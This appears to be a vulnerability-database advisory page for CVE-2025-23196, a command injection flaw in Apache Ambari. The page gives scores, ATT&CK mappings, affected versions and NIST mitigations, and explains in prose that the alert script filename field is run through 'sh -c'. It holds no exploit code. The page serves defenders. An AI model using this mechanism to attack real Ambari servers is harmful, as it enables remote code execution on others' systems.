Cyber Resilience

CVE-2025-23196

HighRCE

Published: 21 January 2025

Published
21 January 2025
Modified
09 June 2025
KEV Added
Patch
CVSS Score v3.1 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0202 84.1th percentile
Risk Priority 19 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-23196 is a high-severity Command Injection (CWE-77) vulnerability in Apache Ambari. Its CVSS base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 15.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A code injection vulnerability exists in Apache Ambari's Alert Definition feature. The flaw occurs when the script filename field supplied during alert definition is passed directly to a shell via `sh -c`, enabling arbitrary command execution. The affected component is the alert scripting mechanism within Ambari, and the issue is tracked as CWE-77 with a CVSS 3.1 score of 8.8.

An authenticated user with access to define alerts can supply a malicious filename that results in remote code execution on the Ambari server, potentially allowing full compromise of the host. No special user interaction or network-adjacent access is required beyond valid credentials.

Public advisories on the Apache mailing lists and OSS-Security list confirm that the vulnerability has been addressed in the latest Ambari releases, recommending that deployments upgrade to patched versions to eliminate the command-injection vector.

EPSS remains low at 0.0202 with no material increase since disclosure.

EU & UK References

Vulnerability details

A code injection vulnerability exists in the Ambari Alert Definition feature, allowing authenticated users to inject and execute arbitrary shell commands. The vulnerability arises when defining alert scripts, where the script filename field is executed using `sh -c`. An attacker…

more

with authenticated access can exploit this vulnerability to inject malicious commands, leading to remote code execution on the server. The issue has been fixed in the latest versions of Ambari.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

The command injection vulnerability (via sh -c on script filename) directly enables remote code execution on the Ambari server application, mapping to exploitation of a public-facing application (T1190) and arbitrary Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-23195Same product: Apache Ambari
CVE-2024-51941Same product: Apache Ambari
CVE-2026-30898Same vendor: Apache
CVE-2025-60021Same vendor: Apache
CVE-2016-15057Same vendor: Apache
CVE-2026-42252Same vendor: Apache
CVE-2026-4048Shared CWE-77
CVE-2026-31059Shared CWE-77
CVE-2026-22284Shared CWE-77
CVE-2024-39783Shared CWE-77

Affected Assets

apache
ambari
≤ 2.7.9

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly prevents command injection by requiring validation of untrusted inputs like the script filename field executed via sh -c.

prevent

Ensures timely patching of the specific code injection flaw fixed in latest Ambari versions.

prevent

Limits damage from RCE by enforcing least privilege on Ambari server processes and restricting alert definition access to necessary roles.

References